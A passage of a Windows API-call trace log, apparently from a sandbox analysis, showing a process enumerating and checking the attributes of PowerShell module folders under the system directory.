lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x33 [0149.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x33, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0149.939] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\*"), lpFindFileData=0x5a0d544 | out: lpFindFileData=0x5a0d544*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9e0 [0149.939] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.939] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0149.939] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0149.939] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0149.940] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0149.940] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0149.940] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0149.940] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0149.940] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0149.940] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0149.940] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0149.940] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0149.940] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x497da680, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x497da680, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0149.940] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8100bf6e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8100bf6e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0149.940] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0149.941] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0149.941] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.941] FindClose (in: hFindFile=0x68e9e0 | out: hFindFile=0x68e9e0) returned 1 [0149.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d504) returned 1 [0149.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d764) returned 1 [0149.941] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.psd1")) returned 0xffffffff [0149.941] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.psm1")) returned 0xffffffff [0149.941] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.cdxml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.cdxml")) returned 0xffffffff [0149.941] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.xaml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.xaml")) returned 0xffffffff [0149.942] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.ni.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.ni.dll")) returned 0xffffffff [0149.942] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.dll")) returned 0xffffffff [0149.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0149.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x40, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0149.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.942] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0149.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0149.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x3e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0149.943] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.943] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\cimcmdlets"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0149.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x37, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0149.943] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.943] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\ise"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0149.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x50, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0149.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.944] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0149.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0149.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.944] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0149.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x4d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0149.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.945] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0149.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x53, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0149.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.945] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0149.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x53, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0149.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.946] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0149.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0149.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x51, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0149.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.946] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0149.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0149.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.947] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, 